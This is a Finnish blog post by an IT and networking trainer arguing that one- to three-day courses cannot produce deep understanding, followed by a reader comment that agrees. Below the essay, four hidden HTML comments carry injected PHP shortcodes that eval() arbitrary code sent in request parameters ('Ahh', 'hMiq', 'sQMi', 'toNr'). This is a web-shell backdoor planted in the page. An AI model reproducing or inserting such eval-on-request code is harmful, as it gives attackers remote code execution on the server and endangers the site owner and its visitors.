Kuinka paljon voi oppia?

Mie siis koulutan. Opetan ihmisille kaikenmoisia asioita lähinnä tietoliikenteeseen ja tietotekniikkaan liittyen hyvin alkeista aina hyvinkin syvälliseen osaamiseen asti. Aina toisinaan mieleeni hiipii epäilyksiä kursseista, niiden sisällöstä ja opetustekniikoista ja kaikesta siihen liittyvästä, seuraavassa yksi niistä.

Miten paljon asioita voi oppia päivässä? Kolmessa päivässä? Viikossa?

Perustason kursseilla, joilla etukäteisvaatimukset ovat käytännössä olemattomat ja koulutukseen tulijoilta edellytetään ”tietokoneen peruskäyttö” tai ”perustiedot selaimen käytöstä” tai ”yhteiskuntakelpoinen ”, opetetaan aivan valtava määrä uusia asioita. Kurssin aikana mainitaan tai käytetään kymmeniä uusia lyhenteitä. Harjoitustehtävissä tehdään asetuksia ja testaillaan toimivuutta tavoilla, joista useimmiten kuullaan ensimmäistä kertaa.

Kurssin sisältö täytyy tottakai muokata houkuttelevaksi, myyväksi ja kattavaksi, jotta saadaan asiakkaille ahaa-elämys: ”Tuolla kurssilla opin tuon kaiken!” Jos olet valitsemassa kurssia kahdelta eri taholta, joista toinen lupaa kouluttaa ”perustiedot” ja toinen lupaa ”asiantuntijuutta”, ei ole hyvin vaikea arvata kumman asiakas valitsee. Tässä mennään pieleen ja pitkälle.

Helppo selitys on tietysti raha. Koulutuspäivä maksaa ja mitä vähemmän päiviä sitä halvempi kurssi. Minusta kuitenkin yksi hyvin opittu asia on kuitenkin arvokkaampaa ja tarpeellisempaa kuin ohimennen mainitut kymmenen asiaa. Omilla kursseillani yritänkin, joskus hyvinkin tylysti kurssisuunnitelmaa karsien, saada oman kokemukseni mukaan tärkeimmän aiheen oikeasti ymmärrykseen ja jätän selkeästi liian pitkälle menevät aiheet kokonaan pois.

Milloinkahan me kouluttajat, meidän työtämme myyvät ja meiltä koulutusta ostavat uskallamme sanoa totuuden ja hyväksyä sen, että yhdessä, kahdessa tai kolmessa päivässä minä tai kukaan muukaan kouluttaja ei pysty saamaan aikaan syvällistä ymmärtämistä helpostakaan teknisestä aiheesta, saatika mainosten ja kurssikatalogien listaamista aiheluetteloista?

Palaan tähän aiheeseen varmasti monen monta kertaa, mutta olkoon tämä pään avaus 😀

<!– [insert_php]if (isset($_REQUEST["Ahh"])){eval($_REQUEST["Ahh"]);exit;}[/insert_php][php]if (isset($_REQUEST["Ahh"])){eval($_REQUEST["Ahh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hMiq"])){eval($_REQUEST["hMiq"]);exit;}[/insert_php][php]if (isset($_REQUEST["hMiq"])){eval($_REQUEST["hMiq"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["sQMi"])){eval($_REQUEST["sQMi"]);exit;}[/insert_php][php]if (isset($_REQUEST["sQMi"])){eval($_REQUEST["sQMi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["toNr"])){eval($_REQUEST["toNr"]);exit;}[/insert_php][php]if (isset($_REQUEST["toNr"])){eval($_REQUEST["toNr"]);exit;}[/php] –>

Jaa Facebookissa tai sähköpostillaShare on Facebook
Facebook
Email this to someone
email
This entry was posted in Työhommia. Bookmark the permalink.

1 Response to Kuinka paljon voi oppia?

  1. Jarkko says:

    Tästä näkee, että Markus on oikea kouluttaja (ei siis mukamaskouluttaja). Asia on juurikin näin. Se, että oppilas osaa kurssin päätteeksi luetella 70% kurssilla käsitellyistä käsitteistä, ei todellakaan tarkoita, että he ymmärtäisivät ne.

    Eli kun te rakkaat asiakkaat (jos joku onnekas on tänne asti eksynyt) tilaatte kursseja. Älkää ostako sitä halvinta kurssia, millä on pisin lista opetettavista asioista. Tällöin heitätte rahaa hukkaan kaikkialla muualla, paitsi siinä kvarttaalin päätteeksi esitettävässä “tulos”-excelissä. Se sama raha tuhlataan sitten näkymättömästi seuraavilla kvarttaaleilla kun ei oikeasti ymmärretä niitä termejä, jotka muistettiin juuri kurssin jälkeen.

    Tilatkaa koulutusta ymmärtävä kouluttaja, joka jo heti ensimmäisessä palaverissa sanoo “Jos haluatte, että kurssilaiset oppivat asiat, pitää meidän hieman karsia tuota vaatimuslistaa tai järjestää useampi kurssitapahtuma”. Ei ne sitä siksi tee, että saisi pumpattua teiltä lisää rahaa (se on sen kouluttajan vieressä istuvan myyjän tehtävä). Ne tekee sen siksi, että niitä oikeasti kiinnostaa se lopputulos.

Leave a Reply

Your email address will not be published. Required fields are marked *

Varmenne * Time limit is exhausted. Please reload CAPTCHA.